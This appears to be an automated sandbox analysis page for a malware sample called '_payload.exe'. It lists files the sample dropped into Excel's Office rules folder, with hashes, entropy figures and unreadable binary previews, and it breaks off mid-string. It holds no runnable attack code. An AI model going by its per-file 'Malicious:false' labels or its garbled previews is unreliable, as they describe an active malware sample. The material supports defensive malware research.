                                                                                                      Preview:<?xmlN..fyu.*N.......EE..;.ij....T>...../C..p.m..dkZ..:..3.GZ..h.Q..9.Wy......y.B...&........?....&.o.<..[B:.|....,....^7..B... ...........'........{..P.{/..8........z..J.....P#.J.L...&UC.,:..FX._...i...T...u...k.4u.L..].O..s._..v.j..Lc.[.>...?/....7.%.KV.}......(...~B....!.q|+.>J..k...-.fm...M..aGTZ.nz.R&.(.+.Ue...bR.....V.W5..Z. ..tL....7.....r..~..B._x#..9."..J.a\Z.8l=.p.Q.......Q...w.R..N...R..{...L|hK+@`j...t.I._.....o.#?...6...K..&..M.Inm.X+~..[..o...Z...p..iD.rM.'xX..uzBH/^...?K.....L...j.O~@J..^?.2+.f+.z......$..:d.MvX7ho....^.....q... ..>...I.$....^....yO..&!..s..T.D.....4.... GL3.....[...3.RG.....Z.3[~.C.;IG..Da..'...<...Ta.._x..3..Tx....g....b..q....K.WH..J.E_.g...Y.<..1.)bh...\^...{S=.q.%J6.Zy.V....v.:./0.^.x.s....|>..=...G|5C*...7D.@Lz...R...g.^.T..E.saQB..CXq:+G....2.)+.k..].._!...4.6W....RSg...I.#...X.......Q...u.u...p{.l..,..]~.k..pxJ...:.Wu.'.h........)..<Q^..c7.5.+..U....9..p.".a ...F..u.>...eH....5.....X.|..... ?+8.(

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10808v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1395
                                                                                                      Entropy (8bit):7.844131582867642
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:cJ7ssG0M9YKkDeaZUE1N8wcpqlvphctBV/U9I97scBmqdx7mn6HS2PjGv6bD:cJ+Ce0Bhcqvch/55dxNRPjGwD
                                                                                                      MD5:F7D1B01E89E6D5110A431FB8E5601DF7
                                                                                                      SHA1:461A72DAD8C8B0FD9DEA586CDAF415DBFDDA6DE7
                                                                                                      SHA-256:B1B62E49E14CCDCDFFEFB6C69CA342C05FC7A19DCDA6C3D3E76790EC3BBED942
                                                                                                      SHA-512:0AF6DE527FEC875503DC55F225B0C6350B2CBEB61AF82DBB3F65E64C62E93D4511F025564C4B126A300389359E5EFABF73015A2DA983B5837525EC7497F49DA8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..H..]#.F...)T\.......^....'c.B..Z.....R.%d..Z.*!....',......e.H.:.Fb5a..o.<.S.9.b...J.a....yO.8.'..j.p......#@&..y...O.D..t.....?....s^.........x+=.C0../.A...`.d7..V..O..}...>-0|...m.@.'.... .0\.t).>.X.B&..B.s...w.u.Tt../.3.j4.......k<x*A[/.g-(N..l...=A\.2l..{..}...g..f.O....\...m.K_Ny..).Y.C._..#>.*......;.vP;..<.J...$%.....gg......... C8..t......O..4.9...%...v1 .........E..OG........,n....x...<..4..W...,+...Q.E.."......w.1!&.Z(.4.XD.sC...'..W.Pi&.....3."..;..C...h..b..R.(..07......qDb.%W..6H.+U.d..'....=..jh5..a..u..u.{..%8.'.....YJ.')......:.I..#U8.r....,....P....w `.b']..I...?s.d.Da..w.S..fto..P..+#.$b.4).p.e=.|Z8.6{..:(.jp../K.L..q.@T..f.=1'......g..RJ.Y..\%....cn..+.{7.e....9^[.x27.F..7.MvO...i..1..Il...".$Y.|@a.X..S.,........Zl.)L../hL$.c.;..*;..l.;;!..}r.....^.g.t..Igri.)...v{%.<.o...m. rh.f....L...!mK...\.I..\eq..L...A..?@.....XA...P.|h.i..V..N.+.O&>...u3....{>r~.."...DeD$i=.M.`...!.k...F.?.7:.o.4....9.lZ:.*.1..@.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10818v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1124
                                                                                                      Entropy (8bit):7.784641207017083
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:gMTdPjOPXjmxGBe4JPhnmhv09tO89KllDG7Rh3kttIs5Y+pfv6bD:gMTdPjkXMGU4Jpmhv093Ilc7RhIa+9wD
                                                                                                      MD5:E448BB81CD98113369C033998A6DEBC6
                                                                                                      SHA1:544775D036244408ED4514FC48D77AE719AE50A9
                                                                                                      SHA-256:D62E123C0F9A1E8AD7D00C04E4A2E336FE1C2913D6EC0C57353975ABB616CD9A
                                                                                                      SHA-512:BD1E217DC0467BDB152BF00C07C0339B96446D19950226D61AC58573E43CDBB2A0EB550EE6BFB910D7C492518A8290FE45B0745260119373EB68CC03C19BDCF8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml].GU....t...A.T.......#.d..Uu...&....~.{n<...)K>g..eu....ip(.k?......V.. ..;6...V.Z+...(z..DT.Q..1...E^R..Y.S.cI...j.@.....W^_..fy_{....M..=...YZT..K...b.K...hm....`.....1... }_)6.0.....H.E....0..C.K.\...;T.Kd.}....'A...Mj2..n.......iBx&..c...>{.j.......V..ki>.o......0..TX./O_.F.....En......x.......fc[......Z~..o.IG.C..{2~.......~..9.C.,.v1......H.E...J)..j......8..z.a...w3.1}..V%..|...A-Z...?...K..5.....Ai.A.N5Y..lsdA....J..O..3..C-.j..2.+........#....+....\.(u.............H.j?.F.F..q.....$..r.y.}.Z.%..i..Q........xR...........p.R..E..1..b..._.j...?].)......G...0....2...o...70..a..1.!4.$.^....m.x)....mw..d..>..........d.+q.ME.....Z#U=..Vl...W..Q{....wC..M.$eJ...MZ...jU..J.P7WI.'.(.JX7M.h-D....w-..'........7."..-.F.e...c..^.....U.`.j...V.^..}.+.UU..t...)........N....dZ$.%d.[+...\j.v.g.j<t..c.=.A...K./+...t_...-k...TkE,P.R....MiL..e...{.x....B.w...$.{>..ylg.....4....(g.....v.3.(."....4...9FS..x]$.E.@d..XR.....'T..[z...6.6....Qo..S..I

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10819v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8769
                                                                                                      Entropy (8bit):7.974926982215658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:n4OmVgXVfj0VLIkhIdZvpEtK46qCBtaRET+C5u7mbFOT9e7wWo9:432F2LIqwZitKuCBtHCB7m4TE7wd
                                                                                                      MD5:D572CA45C9791B57E65FB8D981605FB0
                                                                                                      SHA1:7280FA22D27330D040B771E18D698D845D76257E
                                                                                                      SHA-256:82194CC3B4B95199467A150C4186D481D977205620E37D6F934161EBC4C28ED0
                                                                                                      SHA-512:0AD6AB4A257299EFC9750668663966195DAEEFAEF11B60206D7B1CEF27F60CF9CCF2FDF51B8A339A38C4584FA8C87780A1D8D66A5070CA667F169A7BDDF2B66A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..5.q.E......)s.b.oP....*{un..".M....c...d.)...............s2LuS.....O...Iz...&..H.,...T...M.^/....g..:.......!..!....%D...1.k.%cQ>.!m........n.N.& ..0..Q..#.4..uo,.nI.....<E..$.=N.z'.}...Xq.(...a."..![.n.. ..)b.a...h..I?NN...F...&...?(H.b...e\..Q..{.......m.@=.d.h.B...|8.....U.....ZB.F.L.h..(..ez.u.LV6]G.e.f.l.(;77.&.+-^.}......%.(.0..B.Z.h)u|.xNb...\..N.....[.....~C.B..g...,n.b.|F........-Pm./.=.\.Wz.fQN..y@.x...D-.UT..m.o.Vw.SF..p..)...o...^.../..K.Wt .m.:.G..o....%....K7....#w]..7.>>k..6R.....<I..c..V.M.`vZ...R.d.....*..!..0.>..f5.>..$./z..$...=..d..*`.S{%L.!.7..R......}.7EEq......*.B..ES..J.....>w...V..SzNQUa..!...KN."....Y]*6.......W...... ..+.(..V......F@v.....=K -.l......w0.B....t_M..Gb.p....S0i..9....)...>,vE.../.s\...@C14......!..&......H2....D.:........2.O@.7.=.KR(.S...x!.%j....C.C..e...HLt...yE...U..v.0....Ej......2+..F..\.`.k.s..%r......b...4-y.Y..,.C."n 3...g...=...R..)...|..6.W.-._L..V.........Y.).r........].N..=..@..T.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10820v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5842
                                                                                                      Entropy (8bit):7.96757914280788
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:P+XLGU1EHzvTN4t0rgD4GOr/2OoO0auV2Pr1FQuJY8doug17u/uWChmpAtLQjnF8:2XLGU0vp4tygD4GOrR70KpF/JYg5r/uf
                                                                                                      MD5:50DA651CFBDB2420C45FEE802A43755E
                                                                                                      SHA1:FAC1E96C911B6F07E4DA732C653FE6C29FB48D87
                                                                                                      SHA-256:B52EF8D978A2F203E5390E6BF229CA27EBB8853B6904131A85F0AA26B799B6B0
                                                                                                      SHA-512:5C0A39E7DC18883EFDF1ABBBE954BA214C622777441FEB99EECD0C720B32642BE1F807349C85CBBD1A4C769771834FF35C5FB95F0F9BA834B49BE0A4AB09EC64
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Y........y...^;.-.....Y".f""...1J.Gc..e....J..+..BX....B .<R0.. ...hw..q..........3x.Z...~..,..>!..}.:......h..s......~....A.*5....J.5VC.U.rC.vjN@#.K.h...Q..E....c....Rc .]...&..Q..;......eX/.....$:......eE.MH.)R.Y].}=h>...0.rmL..)..h?............?c.....i..n,+.H;*..4.[...;.Y......$;/z;.i\.......iV..l.e1.Ky......(k.6.'......F.J?..f.y....Q.*.+...`A:0.m.....C.g.z......U\c^6..W..!mk.}B.^...&`...*.y..@.#Yw.....=...XSw{......f.J.{v..tr_..@(8....$...xaDX..].E...F0...XCI..~.$'..c.X...z*.-.LF..F ...7k.E..9p<,Y......Gp.A.$x.m..Q.1.p<L..x.5.hd.U.....$qr..W.2...q .Zy.SkB.j.Q......../......TX........;.o)=...9cO.1.5.Dn.P..z.V..n.Y...Ir>C.....VU/+..~&...N..xi.f"2.'.K.Q.w.R.....Q.........k!].......F..]..v..\:.....].>....W9....(.n\!../.3......}..\.@.N..3dw....{..]...p\....He.):&.$x.....gWp.,\[.u.C{....I...bZ{|h........lQ.9..".&>z.......q.....1..;.f.E....2...bT.7p..$...\Y..B....Cd.K?H..g.E..).kg....G....Q.A.{..iM#_.vt...0...k.&.Bm.^...(1C.u<.y....).2fH.1

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10821v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4787
                                                                                                      Entropy (8bit):7.957703035481956
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:gZy7cxRYjDphxXKI7hI9ziQWcWmQOcwnMCXMzfF+6pDiZGi25fRtZONa74w:v7k+j7ZKzt6OcLGMz9+6gZwXtcST
                                                                                                      MD5:C81843A6304608B16ED2E4B79FF80D80
                                                                                                      SHA1:8AD8168123CA01522588DD3F51DBAD8E5C593D79
                                                                                                      SHA-256:EF623A6927314AF079099A7A7041BAEE52077FA7CDCB507AD8A1104A9DFFD87A
                                                                                                      SHA-512:5070A1150E038A34DC6EB98D1C25E6091CD9C19515879335A0FFF431A5C7668E165C30D300457BA531BCC5938C07269D2196F4250EF3345726536AF8C406740C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..+>..[.....i..x..a.#4..G=.Sy:z........P....gYd.yTsT.cW......_....<c*+.....H.q...[.*..-..o...2.mo...aI.WxtFGZ.f#I...1:...1.:.xC^|....Ulc.).......K.$.!Ou.....w....T!lR...j..;..+..q...{.2.e.t.Pe<..O./6.}..g.%.@~. .ah...I.....^.X....=:w.dMm...W. .JR<g...hQ.%f~.?.."r.:c..#..~z.....N.....n~.K ,x...%........>.{.\...nP..Wn..%.P.....).......jZ.h........!.n.-t_.....g.hL.../@.a.".....[..}.#a.....2.....8..<. .;....M..|....A.x.O...8.m.Q8.....=j.y..F.6S.r....q..5.....F.=n.}[....s.f....B.?)]z.b.....4@.......8..U.4/P.b7..vbz.B..T..M.Z..l....;.F......D.....W..Q..K.g..T.5..@Xl.q.B.....t.U.7.^.IcB&!....u.G.B.r0E....7.~...W..b[.|2.o.lL....}.|....]%.N+.._.~..H.....o/.@...I%.p.a..s..B..^..."b.......\....h.c../.cy7...-...$/......^......{m.q.....h..3.QPl.0..y.....a/.R..t.O...e.......].....$.........A.j.o..M...$|>.C1..w...~#2....h..q..M......?B.....+k.......m. .T..V.."......./...Q..9...._...2JO4..m.....<G..O....k..#.p.n?...G/f...?>.........,..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10822v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4786
                                                                                                      Entropy (8bit):7.9560456794588275
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:KwckseaCReFhWwPIGAmn92DVJvDTTbzYnSWL7j43jslIbWGqIixoo9:i79WH/m92DVJajl2Wz7
                                                                                                      MD5:892C74DCA5F3738F226C54D3C7A339DF
                                                                                                      SHA1:D210BB14FEACA085004764CCB30A54686F23A11F
                                                                                                      SHA-256:F4360D290D9F89AB9238485040824102E59B91ABA9D55712A928D87CFB246C89
                                                                                                      SHA-512:94B1F733E2AB573F8D7B0817E48D4514C219B4D0F0E25BA2788FFC92501D350E5C00256075A8E69E422BA73D0044D5AC95CF026D24808E10D7811AB16D9504F4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlbM...r#....N....*S c.^..*..g......e..+v+u0....!...G."..?C...3Y..........n.4\..".Z>r..........<..h..O.*.gI.F.j.....l.8.9$c.../w.....kQ3..6.<.s.=..2....w'...i.bN...S^MFr@.d.n......p.).....$...G..R.../.z..~V..oA.......4..X.za=.{tk]..B..:...8;o..F.g.z.,.~.9.].1^...{>W.+D.+f8..2_F.#&..C%...^Wn...F).|.=....SX...3.F.....\..W....+.....!L.d.....S.u...6 }. .i...V6F~...T....]....@'w.........y..._..w.x...=l..h...*:...9.D.(..t...V....R.*T..<..$X....=~&....*.EP..(.i.e$r;.{.j..#......f......B../.?.E....a.@...Y.?,.O=....^..O.....G..M.;.zJF...?.O.l.a.,.T.....|.`* ..%..g.....S..nK. .lz.o../.~2. ...Z|.J....I....E..0!.G.)..o.b....&...h..r....#.gn./.[k........tr.....W...u.:lpQ*/.B.\....<Wo..S....V...G..U..?Nlm.._."o......z.....YiC4D.,,.Q.KQ.T.f6..w...L.e...Y..{..tsE1n.EC3....c5..Y.-...{h..o.P.X.?........R..8..%w.;../.n.;.C.n.8!......C@...C.. ..(..94..K.... .#)fR...........'...`.VP_...[.....wX.Cv. .......JQ>C.U..".n.1...REY=.j..0t..@.Yh..C.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10829v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3030
                                                                                                      Entropy (8bit):7.923674549377964
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:n/e4OF4pUXub72S8tZuoKLqstJp1tVkqR+kywdyW3Ul/0FglGY3CEyYjXRVSj/Wq:WApUJHtZQqW+kyeyXl/U8bRsCS+g
                                                                                                      MD5:FEE4DA3B559A4262D8869D9E571FF623
                                                                                                      SHA1:844F7B252ED41EBD46CE0CA2B6441603EE24655C
                                                                                                      SHA-256:A555997EF5B2F3309A7AE7529001B1C46561973BD24100FA932BE6A6C5917BCB
                                                                                                      SHA-512:CC846F204E37E321AA39370CBA5F30A58D1CEC32CC7F433AC70F0DC282DDBC6AF31C1CCEB171E883247062766F8397FDCEC56F6CFF86D3409BB0E284CA1B90B4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlHs.udP9..nw...r..'.p.....2...e... .A.V........4......wN.A.7~:.A{rj.ms..{..R...C...8.t.Oh.5..G.EH......{$...9.b.Y.W...r..zR...$..h..#K.....$.@..~..-...K.HYL.*.V.0..)h..QS...>&D.'..3....Z..J......_z..E...k...b..=...\_.A.C.7.C..[!Q.M.1:q....i..czH.1..C@_Er.....u......pj.0.E....(wAF.+!.{d.....3E.FF.a.......e!-.._.PP......Wg.B.....u.I.U~..'....hr+.>r..v..;I..k...u....K}.AA..x.mqI..M ..1.Z&...iw.=..=~......Y..rD...q.... .\=c^u_b.4E..W..K..$.1`....Q.[.o.>...D..5w.;...nMj..!A#...^$&.(2.y.*X.......{3h. ?_.. A..v4..PZ..8;....&..WD..)..6H.S..:..!R.F..cLH..P..2.j.1 wf_..5......O.25d9......C..T..y..%)....8.Kn.d.#.....jr(.......D.d..a..e..VZ*.<l......e.sF<m..3b...tq...O....%...9..IH.0_t.}.v.8)..z.3,..lP.._&....Acq.m....w..q....9....P...........0.K.t.e.{.'.Q...............PB......$#dx.iWII."`......I...............u.7.K.x..)V.;..[...R.e.a..B......f]....|...[d..2'..o^`.W.(t..W....S..L....#..snSi.m..~izWX..0..kS=e....'$....Ri%Z..b...x.>...I."

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10879v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):789
                                                                                                      Entropy (8bit):7.740682782665464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:pos9lICdAbsLlJdsqJbPk9SOg8ovMMgbAs8yRjWnVjhLCjY5coWdzDv6cii9a:Dl/ebsLlJtJs9Z5X8yRmC85coiDv6bD
                                                                                                      MD5:92C892BF851A84F85CB61F3DCE5CA223
                                                                                                      SHA1:188121A338A75D5E5362C47C2DD573E573DD141E
                                                                                                      SHA-256:F50EB7411E6C2C0C51767E64A594C06F7BBA26EB6F949903E30F7B77B76F5078
                                                                                                      SHA-512:344C36A9A5050285D0AB9DF36E132C99726FEFFBD5E4AA45AFF0BF351DC299024DFF2D5EC1A81F15E567AC8F50C2A07DB1C8FEDAD0D9C0A5FAEFAE01DBB3E055
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml2L)a.p..Cl.....)... .;..[.e..@R.]+D..}..n.A..`@.'.i..h.'..".to......9]7..u~./......1.dYR].g.7......x#:..[gQ."bX..^TB.:.....S}R.f%..%.x..7..i`.....s....;/.z....i.....U7.)...w&.f.6.!..x....7.;r..x....!.<..k....O.I..8....p.J4......C&.%.......S.....3..?@|#Y...F.i".....E._.|<.........fK,.&.Dy.z.....(....A..@....LE.1..:..........N..y.&B|......t ..#z...p..:4....hWEN.)Tj.p^..5..yf..o2.`.V.C..........&..d.].B...7{oA\G....Wf..\f.hl..4.$.....L...D..\..M..C"(....R...E}..-.f....F.......G.3h.......%.q.s.;.%.....j.;z.do..o.(2.G.$.&.... j.J.i.....{g.C.2..8U...9...h....=cE...wF..4.B.,..9.=(...Bh..).G/_K.;...6.B....+.^g..).E...#.;c...d.T'.Nn..n*%Q.57.C..U'T.&...I.Bq.zr.g...^...X.....n..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10880v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.941683575532159
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:loW0BkeCLjwHUJpYH2uufFF+R5Kzh9KeuxZDhQypoz0NkLvupfwD:lZNeFY2WuufFUEDKthQPzhLvup0
                                                                                                      MD5:CE2F6770212D489108AE6908F7482975
                                                                                                      SHA1:D1A5BC5EFE445A1585205BBC68FEB47C587E81A7
                                                                                                      SHA-256:7118D55CD621CF659F88E64F4AEF38151BF0505ED0728AEEAE2C9183A7B8D9B5
                                                                                                      SHA-512:908C11FD20F58F0D4F5087F08399E2110816CC5F8F2703B02B62F6FAEFD9C410DDAC369EED155432C25476A9974878B559B3D75DF03ED5AF0C7C72F67D2FDE6F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml|=.En...^......G...E....K....U.v@..xH....i8...-.......8,...$.8.Z........U..8..?.....d......F(..g. X+...:.......N.#.NX(...H9.Fa;.~Uq.T.@9.n.....K..BR.C....]....lGrM..M......QbY....o.|J.."..1.<.[..r..D.V.8..s#b../...2SS....Kx....0.X..d(.|8....6.RT..7.y$..iO.[..<wk...!.]..{O)F..;kh..*.a.,Yon.).6.......L.%q.OeBq..n..]..5.aDk......D,KC.b?v..."&..zU{...4.....^..5l...)....y\...C$.u.GMb.;...h.. g.JfZ.....`...K....0.......4.P...).+H6X.@......u52-.:.....ACr4..W')F.>..2,.t....9........q^.H..G...\.....<'...>MoE%$....4...L..h/.T.GF.&...}.x..A._.~.E.BO.......}Yq$..i.}b[..u>.S...l..{...H.@.S#.._OF......_z.<...A.).<..k'..n.:SbH.P..,...sE.......E...u..."..n......kW3{Ty....eM..P.*...4>K.L.x..-.#.E....r9..ge.B=XF.ui*.....\t..w.lN.Z..6..F&..H.*7...K. ....e>.!....B...Yqs...1oHV[. J.9.....Z.k..^oq.+...>V...|..m.q.x..75.S.....O3..(6....+...7.......X.x._......./c.K..$...Z..).T(\......`....,...g.....^l.b'..x.RA.V.V0.]....'aL.c.7......S.vs.j.JZ.....{Yow.{dG.u.R..t...r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10881v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):823
                                                                                                      Entropy (8bit):7.739585705103266
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:sf2fuDDd8W+VpPng+EQxJt7KiqkAW37DQtPinv6bD:sfs1Pg+E0Jenm7K8wD
                                                                                                      MD5:91C80A0DB085D92AE7AC2A663AED7C74
                                                                                                      SHA1:5660DAEE44C5FE367A680C9D4A8501EA12058363
                                                                                                      SHA-256:7D2F6919BF82761CD88A6310904A358E4BAB2A5AC544DFE681A324689F3B34CD
                                                                                                      SHA-512:C14B933AD07EA0CF659B9AD580B5028C3F243B16C02325ABD96441D50EFB956A3B0F1EC4A3C798B93A9BD2495ED6F1B0C19FA84092A3F8C39FC3168828677524
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.z.t.|S..~..o...<w.FF.Fo....\........H...M.DS.sU..d.Qh..!.c..P....9.........v..p..v^\.x@u.b..k.}6....`R.......n.L..j.*Y...KC..G.go.O.0.}......'..J.*#S."...[T.....t]...}.O.....:P.......~..+<L..q.]........+....{#$*%.........h..)....X.b.?...k..q(xO.3.="...Gf.n.P.(0..S..L0X..?...,.u.....A......}8 o#.....S.X.......N/........\H'.|J.....;^f..J.......+c.s9..o.F..~2m.Q.4..\,..yq]..C.1-.....Il.}.,R....#..%.g.^.wh!N. ..D.L.G..3......|...A...3g!.........a....$^.3...Y.e...lB......G...4~.l..@Q...`~"&Z.@..U..dS..}X..G..^.^..GbD..D..-5.......Z......}yg.^..lS[...t.N6....MA.L..Q.3...w.6...Ah..$sy.....}|.`...K..}g.V..\..S.-/.....k...d.#8e.\./....V.7...q.J...L.......t.....ec1Yi.'..N...oA......\.W....9l.m..;w=.6.K....s&..ZhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10882v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3017
                                                                                                      Entropy (8bit):7.939526200792743
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:OTl97F1yfaxI1kdsiKWx75vRCyShUSZwfcdgdUmuD6mglOVyTTvtDxbX8pJhBZzg:glZFwfaxIiKWn2uSZwoMUmuTglOMvtD/
                                                                                                      MD5:F02FC4A829C11343976231100096AB5C
                                                                                                      SHA1:697EB2DC414640AA7BE7D4B6BD50FB8CB1476049
                                                                                                      SHA-256:694B4973F257361EA5241E60E409825C01018BE3E6AAEC925CBC5E5947EBCD9C
                                                                                                      SHA-512:06905F80BE46BA6E68CA3FCE85CAC87C9C1590BF70B41BC5613A0F67FB145E38258ED49160648D9A9D0308FC3D00DF1DB62DB6DBB1777786339CA3C246A9BADB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlq....(.D.g...n. (<,<.axNj`.rgU....b.Q^...jPT.h%.*.........zoY.+.).p.G*....a.._'.......WUd...`....s..U.....}E.SV\l.....R..!...m.}[..6.^.....K\s....&?......q._qTX..[f..+.....w.n.R.... ..c,"h...G..@s..(....a..p6..F2......E..m.x.0.F.'8...v....'.Y.N..3.....pO+UAP.A?"3...7......0.J.h.........#...vB..'...('dI&.y..t..`}...0.i.*..^..$u^..X\.=.[.B....!9......l..;o:.B....4xy.H.....cg.3.r/..y..C/O.##.9...G.?pB....C....0.US...D...h9..`.^E>........V....A..&.3...r.....fr{.o..v...L.^*......y[..<..c.....m....aA...P.p....%s....y0j=@.O..aSlr5.l...>...1.N..V..B....5.....7A5.D.....q.0.x...w...^/~....- .?...`.3...*..j.xf..k...4.....n5......0..x.)1+....b..f.;..+f.....]tE.iuY..v.<..2O0......+.t..f.<.c..;.......v./...-..j."..J5^<.Q.......n....?...Pt5.9.!.~i...@.&..g......?.w........T...#..z=Uc..T....%4@....-....%hV.hMF..bY..k.*.,.7...h..;..\.P4.X.8.."....hW........n...>....7/.....sY.#..0.E..I.L....9.......b.F>/...N....|..A8.2....m4J...t. O.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10902v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1021
                                                                                                      Entropy (8bit):7.784419170916377
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:0Vj9pOaNnBJnM/+iLi8T43yj+++P2UjqaqYzYTqv6bD:QjfOaNHMLi8T/++EjqktwD
                                                                                                      MD5:4F6F5EC7E95A621D7774C34AFCEC60EF
                                                                                                      SHA1:6C675686FCFAE81D9DC7F897FFBD29CFD4D256AB
                                                                                                      SHA-256:C4C7A9FA1933B971012E34AC5622917C70E0A6A8F28CAFA9C5F0D0E479DC5ED7
                                                                                                      SHA-512:D5291357C8CEE00C1C99C6B98BB3AEF6F1D9043E5BFC24EB3559ABD1B2797D3EF78E1D3E9C1DB682EA77E9B0C92FC472896385B7B590891DBFDAF80091A8E1EA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml^.%#...0....[....$........lmMqQc.'2...(..r...5\2@m....P.FSM-..]..Vv.+.#F..._\M...n.s..2.C..8SL.}D...$.c......x...lr./.."q.X[..s.4..e.,.rPz.....s.)`wh.@..0`.,...g..=.....V@G.vW.4P..mc..qP....~..r...f-H..@.....M2Z.p.LC._n.....c|=..I.{p..V.g1.v..>QrJ...,E.....p.LBN.!.p5.U6.y....b.;.*.z..........:.Y....1...1.k...!@.&|..e.Sp..E0\..O......f.F..n[[t..&\.}.Ay...I.$..*. ....a.^@.No.Dub..,.1.ohH/......0.kv<sG..U.;..z..;1.1z...K.....0.L........U.0p... .........@..3..b.j~g..1.):T..;..!.l...I..4..G..v)..B......j.M.#..xQ#.~/.....y...Z.k.s..'..\...j....8.M}..&..\...,....{E.F..?.........kIS..>[6h..m....H2g.$V.......*......-o*........95o...|.|.@8.2.JWG...C...f0=.....Eol=...xd&.e..G ....{.%.7..J...{....~.e0.....9..e.?.f..-...o.V.tky`....UPT.J...sI1.i.".$..=.1...i.$...u)...**gy...oW.B..K..X...X....A..OW>..lkR.....".Nk..(..c..f..v..@.....*J..,..Q..n........j0."3=..V...6..[@...*.^...R|[...|..o....N=:...#.+.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E

